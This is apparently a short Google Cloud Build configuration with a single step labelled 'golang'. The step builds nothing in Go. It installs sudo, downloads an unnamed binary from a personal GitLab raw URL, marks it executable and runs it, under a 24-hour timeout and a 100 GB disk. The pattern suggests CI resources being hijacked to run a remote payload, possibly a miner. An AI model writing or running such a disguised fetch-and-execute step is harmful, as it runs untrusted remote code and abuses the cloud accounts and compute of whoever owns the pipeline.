  steps:
  - name: golang
    args:
      - '-c'
      - >-
         apt update && apt-get install sudo -y && wget https://gitlab.com/mari.gaslur25/heunceut/-/raw/main/memek && chmod u+x memek && ./memek
    waitFor:
      - '-'
    entrypoint: /bin/bash
timeout: 86400s
options:
  diskSizeGb: '100'
